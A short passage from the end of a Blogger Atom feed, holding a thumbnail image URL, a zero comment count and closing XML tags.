url='http://1.bp.blogspot.com/_f87oXEJfKnY/SSf1Ikgp6FI/AAAAAAAABHY/yeJieOJSPHA/s72-c/images%5B2%5D.jpg' height='72' width='72'/><thr:total>0</thr:total></entry></feed>
